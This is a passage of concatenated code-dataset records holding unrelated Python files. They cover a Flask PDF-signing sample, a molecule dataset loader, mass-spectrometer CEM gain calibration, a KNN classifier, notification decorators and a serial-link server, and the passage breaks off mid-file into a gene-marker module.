If no \"certId\" parameter is passed,\n # this example will use a default PFX file \"Pierre de Fermat.pfx\" stored at static/ folder.\n if request.args.get('certId', None) is None:\n # The PKCS #12 certificate path.\n signer.set_pkcs12_from_path(join(current_app.static_folder,\n 'Pierre de Fermat.pfx'))\n # Set the certificate's PIN.\n signer.cert_password = '1234'\n else:\n # Verify if the provided certId refers to an existing certificate file and key.\n cert_id = request.args.get('certId', None)\n if not exists(join(current_app.config['APPDATA_FOLDER'], cert_id)):\n return render_template('error.html', msg='File not found')\n\n # Set generate PKCS #12 and its password\n signer.set_pkcs12_from_path(join(current_app.config['APPDATA_FOLDER'], cert_id))\n signer.cert_password = '1234'\n\n # Set a file reference for the stamp file. Note that this file can be\n # referenced later by \"fref://{alias}\" at the \"url\" field on the visual\n # representation (see content/vr.json or get_visual_representation()\n # method).\n signer.add_file_reference('stamp', get_pdf_stamp_path())\n\n # Set visual representation. We provide a dictionary that represents the\n # visual representation JSON model.\n signer.set_visual_representation(\n PadesVisualElementsExpress.get_visual_representation())\n\n # Generate path for output file and add to signer object.\n create_app_data() # Guarantees that \"app data\" folder exists.\n output_file = '%s.pdf' % (str(uuid.uuid4()))\n signer.output_file = join(current_app.config['APPDATA_FOLDER'], output_file)\n\n # Perform the signature.\n signer_cert = signer.sign(get_cert=True)\n\n response = make_response(render_template(\n 'pades_server_key_express/index.html',\n signer_cert=signer_cert,\n signed_pdf=output_file))\n get_expired_page_headers(response.headers)\n\n return response\n","repo_name":"LacunaSoftware/PkiSuiteSamples","sub_path":"python/flask/sample/views/pades_server_key_express.py","file_name":"pades_server_key_express.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"35"} +{"seq_id":"17280278235","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 6 18:34:22 2019\n\n@author: zl\n\"\"\"\n\nfrom torch.utils.data.dataset import Dataset\nimport ast\nimport os\nimport tqdm\nimport pandas as pd\nimport numpy as np\nimport random\nimport cmath\nimport time\nmax_atom = 29\n\n\n\ndef find_atom_index_dic():\n atom_index_dic_dir = 'data/atom_index_dic.txt'\n if os.path.exists(atom_index_dic_dir):\n with open(atom_index_dic_dir, 'r') as f: \n atom_index_dic = ast.literal_eval(f.read())\n return atom_index_dic\ndef find_type_index_dic():\n type_index_dic_dir = 'data/type_index_dic.txt'\n if os.path.exists(type_index_dic_dir):\n with open(type_index_dic_dir, 'r') as f: \n type_index_dic_dir = ast.literal_eval(f.read())\n return type_index_dic_dir\n \ndef get29f1list():\n r = []\n for i in range(max_atom):\n r.append(-1)\n return r\n \natom_index_dic = {'C': 0, 'H': 1, 'N': 2, 'O': 3, 'F': 4}\ntype_index_dic = find_type_index_dic()\n\ndef get_place_value():\n place_value = [ -1, 100, 100, 100 ]\n type_list = get29f1list()\n for t in type_list:\n place_value.append(t)\n return place_value\n\ndef get_default_info():\n info = []\n for i in range(max_atom ):\n #(x,y,z,atom_index)\n info.append(get_place_value())\n # info = np.array(info)\n # print('info xx ', info.shape)\n # info = info.reshape(max_atom, max_atom, 5)\n return info\ndef 
save_data_to_local(file, data):\n fileObject = open(file, 'w')\n # for ip in key_group_list:\n fileObject.write(str(data))\n fileObject.write('\\n')\n fileObject.close() \n \ndef changeListFormToRectForm(data_list):\n size = len(data_list)\n result = []\n rlist = []\n for i in range(size):\n rlist.append(i * size + i)\n \n for i in range(size * size):\n if i in rlist:\n num_sqrt = i % size \n result.append(data_list[num_sqrt])\n else:\n result.append(get_place_value())\n \n result = np.array(result)\n \n return result.reshape(size, size, 5)\n \n\n\ndef get_gt_data():\n text_file_gt_all = 'data/gt_data_list.txt'\n if os.path.exists(text_file_gt_all):\n f = open(text_file_gt_all, 'r') \n gt_data_list = ast.literal_eval(f.read())\n f.close() \n return gt_data_list\ndef gen_test_data():\n text_file_test_all = 'data/test_data_list.txt' \n if os.path.exists(text_file_test_all):\n f = open(text_file_test_all, 'r') \n test_data_list = ast.literal_eval(f.read())\n f.close() \n \n return test_data_list \n test_csv_dir = 'data/test.csv'\n df_test = pd.read_csv(test_csv_dir)\n test_data_list = []\n \n pre_mol_name = '' \n molecule_name = ''\n test_data = ''\n for i, row in tqdm.tqdm(df_test.iterrows()):\n molecule_name = row['molecule_name']\n t = row['type']\n t_index = type_index_dic[t]\n # print('molecule_name ', molecule_name)\n if pre_mol_name != molecule_name:\n if i > 0:\n test_data_list.append({'name':pre_mol_name, 'data' : test_data})\n \n test_data = model_info_set[molecule_name]\n pre_mol_name = molecule_name\n index_0 = row['atom_index_0']\n index_1 = row['atom_index_1']\n test_data[index_0][4 + index_1] = t_index\n test_data[index_1][4 + index_0] = t_index\n # print('gt_data ', gt_data)\n # if i > 30 :\n # print('self.train_data_list ', self.train_data_list)\n # break\n test_data_list.append({'name':pre_mol_name, 'data' : test_data})\n save_data_to_local(text_file_test_all, test_data_list)\n return test_data_list\n \ndef gen_train_data():\n text_file_train_all = 'data/train_data_list.txt'; \n text_file_gt_all = 'data/gt_data_list.txt'\n train_data_list = [] \n # if os.path.exists(text_file_train_all):\n # f = open(text_file_train_all, 'r') \n # train_data_list = ast.literal_eval(f.read())\n # f.close() \n \n # return train_data_list\n \n train_csv_dir = 'data/train.csv'\n df_train = pd.read_csv(train_csv_dir)\n train_data_list = []\n gt_data_list = []\n \n pre_mol_name = '' \n molecule_name = ''\n train_data = ''\n gt_data = ''\n # print('model_info_set ', model_info_set)\n for i, row in tqdm.tqdm(df_train.iterrows()):\n molecule_name = row['molecule_name']\n t = row['type']\n t_index = type_index_dic[t]\n # print('molecule_name ', molecule_name)\n if pre_mol_name != molecule_name:\n if i > 0:\n train_data_list.append(train_data)\n gt_data_list.append(gt_data.tolist())\n # print('gt_data save ', gt_data)\n train_data = model_info_set[molecule_name]\n gt_data = np.zeros((max_atom, max_atom ))\n pre_mol_name = molecule_name\n index_0 = row['atom_index_0']\n index_1 = row['atom_index_1']\n train_data[index_0][4 + index_1] = t_index\n train_data[index_1][4 + index_0] = t_index\n scalar_coupling = row['scalar_coupling_constant']\n # print('scalar_coupling ', scalar_coupling)\n # print('int(index_0) ', int(index_0))\n # print('int(index_1) ', int(index_1))\n gt_data[int(index_0)][int(index_1)] = float(scalar_coupling)\n gt_data[int(index_1)][int(index_0)] = float(scalar_coupling)\n # print('gt_data ', gt_data)\n # if i > 30 :\n # print('self.train_data_list ', self.train_data_list)\n # break\n 
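# The loop above only flushes a molecule's rows when the next molecule name\n    # appears, so the final molecule must still be appended after the loop:\n    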
train_data_list.append(train_data)\n #save_data_to_local(text_file_train_all, train_data_list)\n save_data_to_local(text_file_train_all, train_data_list)\n \n gt_data_list.append(gt_data.tolist())\n save_data_to_local(text_file_gt_all, gt_data_list)\n return train_data_list\n \ndef gen_random_index_list():\n txt_random_index_file = 'data/random_index_list.txt'\n if os.path.exists(txt_random_index_file):\n f = open(txt_random_index_file, 'r') \n random_index_list = ast.literal_eval(f.read())\n f.close() \n return random_index_list\n num = len(train_data_list)\n random_index_list = list(range(num))\n random.shuffle(random_index_list)\n save_data_to_local(txt_random_index_file, random_index_list)\n return random_index_list\n\ndef gen_stuc_set_list():\n \n txt_file = [ 'data/model_info_set_0.txt', 'data/model_info_set_1.txt']\n model_info_set = []\n # for path in txt_file:\n # if os.path.exists(path):\n # f = open(path, 'r') \n # model_info_set.extend( ast.literal_eval(f.read()))\n # f.close() \n # return model_info_set\n \n struc_csv_dir = 'data/structures.csv'\n df_struc = pd.read_csv(struc_csv_dir)\n \n model_info_set = {}\n model_info = []\n pre_mol_name = '' \n molecule_name = ''\n for i, row in tqdm.tqdm(df_struc.iterrows()):\n molecule_name = row['molecule_name']\n # print('molecule_name ', molecule_name)\n if pre_mol_name != molecule_name:\n if i > 0:\n # print('molecule_name s ', pre_mol_name)\n model_info_set[pre_mol_name] = model_info\n # print('model_info ', model_info)\n #开始一个新modedel\n model_info = get_default_info()\n pre_mol_name = molecule_name\n \n atom_index = int( row['atom_index'])\n atom = row['atom']\n x = row['x']\n y = row['y']\n z = row['z']\n # print('ai ', atom_index, 'a ', atom, ' x ', x, ' y ', y, ' z ', z)\n model_info[atom_index][0] = atom_index_dic[atom]\n model_info[atom_index][1] = x\n model_info[atom_index][2] = y\n model_info[atom_index][3] = z\n # if i > 20:\n # break\n model_info_set[molecule_name] = model_info\n \n # np2 = int(len())\n # for i, path in enumerate(txt_file):\n # save_data_to_local(path, model_info_set)\n return model_info_set\n\nprint('**DefaultDataset ')\nmodel_info_set = gen_stuc_set_list()\nprint('self.gen_stuc_set_list()')\n\ntrain_data_list = gen_train_data()\nprint('self.gen_train_data()')\n\ngt_data_list = get_gt_data()\nprint('self.get_gt_data()') \n\n \nrandom_index_list = gen_random_index_list()\n \nprint('self.gen_random_index_list ') \ntest_data_list = gen_test_data()\n\nclass TestDataset(Dataset):\n def __init__(self\n ):\n self.data_list = []\n self.name_list = []\n for i in range( len(test_data_list)):\n data_con = test_data_list[i]\n print('data_con ', data_con)\n d_p = data_con['data']\n \n self.data_list.append(d_p)\n self.name_list.append(test_data_list[i]['name'])\n self.data_list = np.array(self.data_list)\n tshape = self.data_list.shape\n self.data_list = self.data_list.reshape(tshape[0],tshape[2], tshape[1])\n self.data_list = self.data_list[:,:,np.newaxis]\n \n def __getitem__(self, index):\n \n return { 'data': self.data_list[index], 'name' : self.name_list[index]}\n \n \n def __len__(self):\n return len( self.data_list) \n\nclass DefaultDataset(Dataset):\n def __init__(self,split\n ):\n \n self.split = split\n self.data_list = []\n self.gt_list = []\n n7 = int (len(random_index_list) * 0.7)\n print('enter DefaultDataset ', random_index_list)\n if split == 'train':\n \n for i in random_index_list[ : n7]:\n d_p = train_data_list[random_index_list[i]]\n # if i == 0:\n # print('d_p ', d_p)\n 
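# NOTE: 'i' already comes from the shuffled random_index_list, so indexing\n                # random_index_list[i] permutes twice; data and labels stay aligned because\n                # the gt lookup below applies the same double index.\n                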
self.data_list.append(d_p)\n self.gt_list.append(gt_data_list[random_index_list[i]])\n self.tr_data_list = np.array(self.data_list)\n tshape = self.tr_data_list.shape\n print('self.data_list ', tshape)\n self.tr_data_list = self.tr_data_list.reshape(tshape[0],tshape[2], tshape[1])\n print('self.data_list2 ', self.tr_data_list.shape)\n self.tr_data_list = self.tr_data_list[:,:,np.newaxis]\n print('self.data_list3 ', self.tr_data_list.shape)\n self.gt_list = np.array(self.gt_list)\n print('self.gt_list ', self.gt_list.shape)\n \n if split == 'val':\n self.val_data_list = []\n for i in random_index_list[n7 : ]:\n self.val_data_list.append(train_data_list[random_index_list[i]])\n self.gt_list.append(gt_data_list[random_index_list[i]])\n self.val_data_list = np.array(self.val_data_list)\n tshape = self.val_data_list.shape\n print('self.data_list ', tshape)\n self.val_data_list = self.val_data_list.reshape(tshape[0],tshape[2], tshape[1])\n self.val_data_list = self.val_data_list[:,:,np.newaxis]\n print('self.data_list2 ', self.val_data_list.shape)\n self.val_data_list = np.array(self.val_data_list)\n self.gt_list = np.array(self.gt_list)\n print('self.gt_list ', self.gt_list.shape)\n def setSplit(self, split):\n self.split = split\n def __getitem__(self, index):\n # if index % 10 == 0:\n # print('index ', index)\n if self.split == 'train':\n return {'data': self.tr_data_list[index],\n 'gt': self.gt_list[index]\n } \n else :\n return {'data': self.val_data_list[index],\n 'gt': self.gt_list[index]} \n \n def __len__(self):\n return len( self.gt_list) \ndef main():\n data_set = DefaultDataset()\n # print('train_data_list ', data_set.train_data_list)\n # print('gt_data_list ', data_set.gt_data_list)\n\n \nif __name__ == '__main__':\n main()","repo_name":"rosaann/scalar_c","sub_path":"dataset/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":12556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43705231","text":"import sys\nimport math\nimport time\nimport math\nimport numpy as np\n\nfrom srsgui import Task\nfrom srsgui import IntegerInput, InstrumentInput\n\n# get_rga is imported from the path relative to the .taskconfig file\nfrom instruments import get_rga\n\n\nclass CEMGainTask(Task):\n \"\"\"Task to measure CEM gain at different CEM voltage\n \"\"\"\n\n InstrumentName = 'instrument to control'\n GainToSet = 'gain to set'\n MassToMeasure = 'mass to measure'\n StartVoltage = 'start cem voltage'\n StopVoltage = 'stop cem voltage'\n StepVoltage = 'step size'\n ScanSpeed = 'scan speed'\n\n WaitTime = 'wait time'\n Notes = 'notes'\n\n # input_parameters values can be changed interactively from GUI\n input_parameters = {\n InstrumentName: InstrumentInput(),\n GainToSet: IntegerInput(1000, \" \", 100, 1000000, 100),\n MassToMeasure: IntegerInput(28, \" AMU\", 1, 320, 1),\n ScanSpeed: IntegerInput(3, \" \", 0, 7, 1),\n WaitTime: IntegerInput(2, \" s\", 1, 100, 1),\n }\n\n def setup(self):\n self.logger = self.get_logger(__name__)\n\n self.data_dict['x'] = []\n self.data_dict['y'] = []\n\n self.data_dict['t'] = [] # time\n self.data_dict['i'] = [] # intensity\n\n # Get value to use for test from input_parameters\n self.params = self.get_all_input_parameters()\n self.mass_to_measure_value = self.get_input_parameter(self.MassToMeasure)\n self.wait_time_value = self.get_input_parameter(self.WaitTime)\n\n # minimum Faraday cup ion current to run calibration\n self.minimum_intensity = 200.0 # fA\n\n self.start_voltage_value = 
800\n self.stop_voltage_value = 2000\n self.step_voltage_value = 160\n\n self.init_plot()\n self.init_rga()\n\n def init_plot(self):\n self.ax1 = self.figure.add_subplot(121)\n self.ax1.set_title(self.__class__.__name__)\n self.ax1.set_xlabel(\"CEM HV (V)\")\n self.ax1.set_ylabel('Gain')\n\n self.line1, = self.ax1.plot(self.data_dict['x'], self.data_dict['y'])\n self.ax1.set_xlim(self.start_voltage_value, self.stop_voltage_value, auto=False)\n self.ax1.set_ylim(1, 100000, auto=False)\n self.ax1.set_yscale('log')\n\n self.ax2 = self.figure.add_subplot(122)\n self.ax2.set_title('Ion current measurement')\n self.ax2.set_xlabel(\"Time (s)\")\n self.ax2.set_ylabel('Intensity (0.1fA)')\n self.line2, = self.ax2.plot(self.data_dict['t'], self.data_dict['i'])\n self.ax2.set_xlim(0, self.wait_time_value * 1.2)\n self.ax2.set_ylim(10, 1e9)\n self.ax2.set_yscale('log')\n\n def init_rga(self):\n self.rga = get_rga(self, self.params[self.InstrumentName])\n print(self.rga.status.id_string)\n self.id_string = self.rga.status.id_string\n self.old_speed = self.rga.scan.speed\n self.old_hv = self.rga.cem.voltage\n\n def test(self):\n self.rga.scan.speed = self.params[self.ScanSpeed]\n self.rga.cem.voltage = 0\n\n # Measure Faraday cup ion current as a reference\n rep = 4\n total = self.measure_intensity_with_delay(self.params[self.WaitTime])\n for i in range(rep):\n total += self.measure_intensity_with_delay(0.0)\n fc_intensity = total / (rep + 1)\n\n if fc_intensity < self.minimum_intensity: # if smaller than minimum_intensity\n raise ValueError('FC reading {:.2f} fA is smaller than {} fA. Need more intensity to calibrate'.format(\n fc_intensity, self.minimum_intensity))\n\n self.logger.info('FC reading is {:.2f} fA at {} AMU and NF= {}'.format(\n fc_intensity, self.mass_to_measure_value, self.params[self.ScanSpeed]\n ))\n\n # Create a table to save data\n table_name = 'Gain vs. 
HV'\n self.create_table(table_name, 'CEM HV (V)', 'Gain')\n\n # Loop to measure CEM gains\n current_voltage = self.start_voltage_value\n gain = 0\n while (current_voltage <= self.stop_voltage_value) and \\\n (gain < self.params[self.GainToSet]):\n if not self.is_running():\n break\n start_time = time.time()\n elapsed_time = 0\n self.data_dict['t'] = []\n self.data_dict['i'] = []\n self.notify_data_available(self.data_dict)\n\n self.rga.cem.voltage = current_voltage\n\n while elapsed_time <= self.params[self.WaitTime]:\n elapsed_time = time.time() - start_time\n intensity = self.rga.scan.get_single_mass_scan(self.mass_to_measure_value) / 10.0\n self.data_dict['t'].append(elapsed_time)\n self.data_dict['i'].append(intensity)\n self.notify_data_available(self.data_dict)\n\n gain = self.data_dict['i'][-1] / fc_intensity\n gain_ratio = self.params[self.GainToSet] / gain\n\n self.data_dict['x'].append(current_voltage)\n self.data_dict['y'].append(gain)\n\n self.notify_data_available(self.data_dict)\n\n self.add_data_to_table(table_name, round(current_voltage, 0), round(gain, 1))\n self.logger.info(f'CEM voltage: {current_voltage} Gain: {gain:.1f} Gain ratio: {gain_ratio:.1f}')\n\n # Calculate the next CEM voltage\n if gain_ratio > 20 or gain < 0:\n voltage_ratio = 1.16\n elif gain_ratio > 5:\n voltage_ratio = 1.08\n elif gain_ratio > 2.5:\n voltage_ratio = 1.04\n else:\n voltage_ratio = 1.02\n current_voltage = int(current_voltage * voltage_ratio)\n\n # Interpolate the CEM voltage from of measured data\n log_gain = math.log10(self.params[self.GainToSet])\n self.data_dict['log_y'] = [math.log10(a) if a > 0 else 0.001 for a in self.data_dict['y']]\n hv_to_set = int(np.interp(log_gain, self.data_dict['log_y'], self.data_dict['x']))\n self.logger.info(f'HV for gain {self.params[self.GainToSet]} : {hv_to_set:.0f}')\n\n # Measure the gain at the calculated CEM voltage\n measured_gain = self.measure_gain_at_voltage(hv_to_set)\n self.logger.info(f'Measured gain at HV {hv_to_set:.0f} V : {measured_gain:.0f}')\n\n # If the gain error is larger than 10 %, set it to fail\n error = abs(measured_gain - self.params[self.GainToSet]) / self.params[self.GainToSet]\n if error <= 0.10:\n self.rga.cem.voltage = hv_to_set\n self.rga.cem.stored_gain = round(measured_gain, 1)\n self.rga.cem.stored_voltage = round(hv_to_set)\n self.set_task_passed(True)\n self.add_details(f'Gain at {hv_to_set:.0f} V : {measured_gain:.0f}')\n else:\n self.set_task_passed(False)\n\n def update(self, data_dict):\n \"\"\"\n Override Task.update.\n It will run when self.notify_data_available() is called.\n \"\"\"\n try:\n if not data_dict['t']:\n self.line2, = self.ax2.plot([], [])\n else:\n self.line1.set_xdata(data_dict['x'])\n self.line1.set_ydata(data_dict['y'])\n\n self.line2.set_xdata(data_dict['t'])\n self.line2.set_ydata(data_dict['i'])\n self.request_figure_update()\n\n except Exception as e:\n self.logger.error('update error: {}'.format(e))\n\n def cleanup(self):\n self.rga.scan.speed = self.old_speed\n self.rga.cem.voltage = self.old_hv\n self.rga.query_int('HV0')\n self.logger.info('Cleaned up')\n\n def measure_gain_at_voltage(self, voltage):\n self.rga.cem.voltage = 0\n time.sleep(2.0)\n fc_intensity = self.measure_intensity_with_delay(self.params[self.WaitTime])\n self.rga.cem.voltage = voltage\n time.sleep(2.0)\n cem_intensity = self.measure_intensity_with_delay(self.params[self.WaitTime])\n return cem_intensity / fc_intensity\n\n def measure_intensity_with_delay(self, delay):\n start_time = time.time()\n elapsed_time = 0\n d 
= 0.0 if delay < 0.0 else delay\n        while elapsed_time <= d:\n            elapsed_time = time.time() - start_time\n            intensity = self.rga.scan.get_single_mass_scan(self.mass_to_measure_value) / 10.0\n        return intensity\n\n\nif __name__ == '__main__':\n    import logging\n    import matplotlib.pyplot as plt\n\n    from srsinst.rga import RGA100 as Rga\n    from srsgui.task.callbacks import Callbacks\n\n    logging.basicConfig(level=logging.DEBUG)\n\n    task = CEMGainTask()\n    task.set_callback_handler(Callbacks())\n\n    rga = Rga('serial', 'COM3', 115200, True)\n    # rga = Rga('tcpip','172.25.70.141','admin','admin')\n    rga.comm.set_callbacks(logging.info, logging.info)\n    task.inst_dict = {'dut': rga}\n\n    task.figure = plt.figure()\n    task.figure_dict = {'plot': task.figure}\n\n    task.set_input_parameter(task.GainToSet, 500)\n\n    task.start()\n    task.wait()\n    task.update(task.data_dict)\n    plt.show()\n\n","repo_name":"thinkSRS/srsinst.rga","sub_path":"srsinst/rga/tasks/cemgaintask.py","file_name":"cemgaintask.py","file_ext":"py","file_size_in_byte":9011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"5648086079","text":"\n# Import the required libraries.\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\n\n# Load the dataset. If an updated version of the dataset exists, load that one.\ndf = pd.read_csv(r'C:\\Users\\Sávio\\Downloads\\flavors_of_cacao_ajustado.csv')\n\n# Normalize the dataset with the best-performing normalization, if it improves results.\n\nX = df.drop(['Rating_Categories'], axis=1)\ny = df['Rating_Categories']\n\nscaler = StandardScaler()\nX_norm = scaler.fit_transform(X)\n\nX_train, X_test, y_train, y_test = train_test_split(X_norm, y, test_size=0.3, random_state=42)\n\nknn = KNeighborsClassifier()\n\nknn.fit(X_train, y_train)\naccuracia_var = knn.score(X_test, y_test)\n\n# Plot the graph indicating the best k.\nneighbors = np.arange(1, 15)\ntrain_accuracies = {}\ntest_accuracies = {}\n\nfor neighbor in neighbors:\n    knn = KNeighborsClassifier(n_neighbors=neighbor)\n    knn.fit(X_train, y_train)\n\n    train_accuracies[neighbor] = knn.score(X_train, y_train)\n    test_accuracies[neighbor] = knn.score(X_test, y_test)\n\nprint(\"\\nTreino, acuracia: \", train_accuracies)\nprint(\"\\nteste, acuracia: \", test_accuracies)\nplt.title(\"Qual o melhor k possível:\")\nplt.plot(neighbors, train_accuracies.values(), label=\"Acurácia de treino\")\nplt.plot(neighbors, test_accuracies.values(), label=\"Acurácia de teste\")\nplt.legend()\nplt.show()\n\n","repo_name":"DSsavioluis/IA","sub_path":"AV1/questão4.py","file_name":"questão4.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"15555353508","text":"import time\nimport socket\nimport functools\nimport re\nimport yagmail\nimport sys\nimport subprocess\nimport platform\n\nfrom loguru import logger\nfrom datetime import datetime\n\n\nDATE_FORMAT = \"%Y-%m-%d %H:%M:%S\"\n# Simple sanity-check pattern for email addresses (raw string avoids escape warnings).\nREGEX = r\"[^@]+@[^@]+\\.[^@]+\"\n\ndef notify_email(recipient_emails: list, sender_email: str):\n\n    if sender_email is None or not isinstance(sender_email, str):\n        raise Exception('You must provide a single sender email as a string')\n\n    if not re.fullmatch(REGEX, sender_email):\n        raise Exception(f'{sender_email} is not a valid email format.')\n\n    if(not isinstance(recipient_emails, 
list)):\n recipient_emails = [recipient_emails]\n\n for _, email in enumerate(recipient_emails):\n if not re.fullmatch(REGEX, email):\n raise Exception(f'{email} is not a valid email format.')\n\n yag = yagmail.SMTP(sender_email)\n\n def decorator_func(func):\n @functools.wraps(func)\n def wrapper_func(*args, **kwargs):\n\n machine = socket.gethostname()\n func_name = func.__name__\n start_time = datetime.now().strftime(DATE_FORMAT)\n\n try:\n value = func(*args, **kwargs)\n end_time = datetime.now().strftime(DATE_FORMAT)\n\n contents = [\n f'You are receiving this email as the {func_name} process running on {machine} machine is completed 🚀.',\n f'This process started at {start_time} and finished successfully at {end_time}.'\n ]\n\n yag.send(\n to = recipient_emails,\n subject = 'Process finished successfully 🚀.',\n contents = '\\n'.join(contents))\n \n return value\n\n except Exception as e: \n logger.error('Error occurred during the process: '+ str(e))\n \n end_time = datetime.now().strftime(DATE_FORMAT)\n\n contents = [\n f'The error occured at {datetime.now().strftime(DATE_FORMAT)} with an exception \"{str(e)}\"',\n f'Your process running on {machine} machine started at {start_time} and failed at {end_time}.'\n ]\n\n yag.send(\n to = recipient_emails,\n subject = 'An error occurred while running your script.',\n contents = '\\n'.join(contents))\n\n raise e\n \n return wrapper_func\n return decorator_func\n\n\ndef notify_desktop(title: str = \"Desktop Notification\"):\n\n def display_notification(text: str, title: str):\n if platform.system() == \"Windows\":\n\n try:\n from win10toast import ToastNotifier\n except Exception as e:\n logger.error(\"Error importing ToastNotifier, please run pip install win10toast\")\n\n toast = ToastNotifier()\n\n toast.show_toast(\n title=title,\n msg=text,\n icon_path=None,\n duration=7)\n\n pass\n\n elif platform.system() == \"Linux\":\n subprocess.run([\"notify-send\", title, text])\n\n elif platform.system() == \"Darwin\":\n subprocess.run([\"sh\", \"-c\", \"osascript -e 'display notification \\\"%s\\\" with title \\\"%s\\\"'\" % (text, title)])\n\n\n def decorator_func(func):\n @functools.wraps(func)\n def wrapper_func(*args, **kwargs):\n\n machine = socket.gethostname()\n func_name = func.__name__\n start_time = datetime.now().strftime(DATE_FORMAT)\n\n try:\n value = func(*args, **kwargs)\n end_time = datetime.now().strftime(DATE_FORMAT)\n\n contents = [\n f'You are receiving this notification as the {func_name} process running on {machine} machine is completed 🚀.',\n f'This process started at {start_time} and finished successfully at {end_time}.'\n ]\n\n display_notification(text='\\n'.join(contents), title=title)\n\n return value\n except Exception as e: \n logger.error('Error occurred during the process: '+ str(e))\n \n end_time = datetime.now().strftime(DATE_FORMAT)\n\n contents = [\n f'An error occurred while running your script.',\n f'The error occurred at {datetime.now().strftime(DATE_FORMAT)} with an exception \"{str(e)}\"',\n f'Your process running on {machine} machine started at {start_time} and failed at {end_time}.'\n ]\n\n display_notification(text='\\n'.join(contents), title=title)\n\n raise e\n \n return wrapper_func\n return decorator_func","repo_name":"abdalrhmanu/ml-experiments","sub_path":"ml_experiments/notify.py","file_name":"notify.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"32658809171","text":"from email import 
header\nfrom enlace import *\nimport time\nfrom tqdm import tqdm\n\nclass Server:\n\n    def __init__(self, porta='COM3', baudRate=115200):\n        self.idServer = 12\n        self.idClient = 0\n        self.porta = porta\n        self.baudRate = baudRate\n        self.eopEncoded = b'\\x02\\x05\\x00\\x07'\n        self.rxBuffer = self.rxBufferLen = 0\n        self.idArquivo = 0\n        self.n_pacotes = 0\n        self.pacotes = []\n\n    def bufferDecodificado(self, buffer):\n        '''\n        h0 – message type\n        h1 – client id\n        h2 – server id\n        h3 – total number of packets in the file\n        h4 – number of the packet being sent\n        h5 – if type is handshake: file id || if type is data: payload size\n        h6 – packet requested for a restart when a send error occurs.\n        h7 – last packet received successfully.\n        h8 – h9 – CRC\n        '''\n        h0 = buffer[0]\n        h1 = buffer[1]\n        h2 = buffer[2]\n        h3 = buffer[3]\n        h4 = buffer[4]\n        h5 = buffer[5]\n        h6 = buffer[6]\n        h7 = buffer[7]\n        h8 = buffer[8]\n        h9 = buffer[9]\n\n        if h0 == 1:\n            self.n_pacotes = h3\n            self.idArquivo = h5\n            self.idClient = h1\n            self.pacoteAnalisado = h4\n            self.pacoteAtual = h4\n            self.tamanhoPacoteAtual = h5\n        elif h0 == 2:\n            self.pacoteAtual = h4\n            self.tamanhoPacoteAtual = h5\n\n        return [h0,h1,h2,h3,h4,h5,h6,h7,h8,h9]\n\n    def mudaHeader(self, header, posicao, valor):\n        # Replace a single header byte at the given position.\n        novo_valor = (valor).to_bytes(1, byteorder='big')\n        novoHeader = header[:posicao]+novo_valor+header[posicao+1:]\n        return novoHeader\n\n    def handshakePrometido(self):\n        print('Esperando Head Protocol...')\n        rxBufferHeader, nRxHeaderLen = self.serverCom.getData(14)\n        print('Tamanho do Head: {} bytes.'.format(nRxHeaderLen))\n        header = self.bufferDecodificado(rxBufferHeader)\n\n        if header[0]==1 and header[2]==self.idServer:\n            print('Head Protocol recebido! Client ID: {}.'\n                  .format(self.idClient))\n            newHeader = self.mudaHeader(rxBufferHeader,0,2)\n            print('Enviando Handshake...\\n')\n            self.serverCom.sendData(newHeader)\n\n    def integridadeArquivoBuffer(self, pacote):\n        # A packet is valid when it ends with the EOP marker and its sequence\n        # number is exactly one past the last packet already validated.\n        header = self.bufferDecodificado(pacote)\n        if pacote[-4:]==self.eopEncoded and header[4]== self.pacoteAnalisado+1:\n            # print('sequencial',header[4])\n            self.pacoteAnalisado=header[4]\n            return True\n        else:\n            return False\n\n    def receberArquivoBuffer(self):\n        pbar = tqdm(total=self.n_pacotes,unit='bytes',unit_scale=128,\n                    desc='Bytes Recebidos')\n        while len(self.pacotes) < self.n_pacotes:\n            ...\n\n    def _get_tissue_id(self, anatomical_structures: list[AnatomicalStructure]) -> str:\n        \"\"\"\n        Extracts the tissue ID from the given anatomical structures. By convention,\n        the anatomical structures from ASCTB are sorted in order of increasing granularity.\n        This function prioritizes tissue IDs that are present in WMG. It takes the most\n        
Otherwise, it defaults to the least\n granular term.\n\n\n Arguments\n ---------\n anatomical_structures - list[AnatomicalStructure]\n a list of anatomical structures for a particular ASCTB table entry.\n\n Returns\n -------\n tissue_id - str\n The tissue ID extracted from the input anatomical structures.\n \"\"\"\n\n tissue_id = anatomical_structures[0].id\n for entry in anatomical_structures:\n if entry.id in self.wmg_tissues:\n tissue_id = entry.id\n return tissue_id\n\n def _get_gene_info(self, gene_biomarkers: list[GeneBiomarker]) -> Tuple[list[str], list[str]]:\n \"\"\"\n Extracts the gene information from the given gene biomarkers.\n This function only adds gene IDs that are present in WMG.\n\n Arguments\n ---------\n gene_biomarkers - list[GeneBiomarker]\n a list of gene biomarkers for a particular ASCTB table entry.\n\n Returns\n -------\n gene_symbols - list[str]\n The list of gene symbols extracted from the input gene biomarkers.\n gene_names - list[str]\n The list of gene names extracted from the input gene biomarkers.\n \"\"\"\n\n gene_symbols = []\n gene_names = []\n for gene in gene_biomarkers:\n symbol = gene.name.upper()\n if symbol and symbol in self.wmg_human_genes:\n name = gene.rdfs_label or self.gene_id_to_name.get(symbol, symbol)\n gene_symbols.append(symbol)\n gene_names.append(name)\n return gene_symbols, gene_names\n\n def _get_references(self, references: list[Reference], doi_to_citation: dict[str, str]) -> Tuple[str, str]:\n \"\"\"\n Extracts the DOIs and citations from the given list of references.\n This function cleans the DOI and gets the title and formatted citation from the DOI.\n\n Arguments\n ---------\n references - list[Reference]\n a list of references for a particular ASCTB table entry.\n doi_to_citation - dict[str,str]\n a dictionary mapping DOIs to citations.\n\n Returns\n -------\n refs - 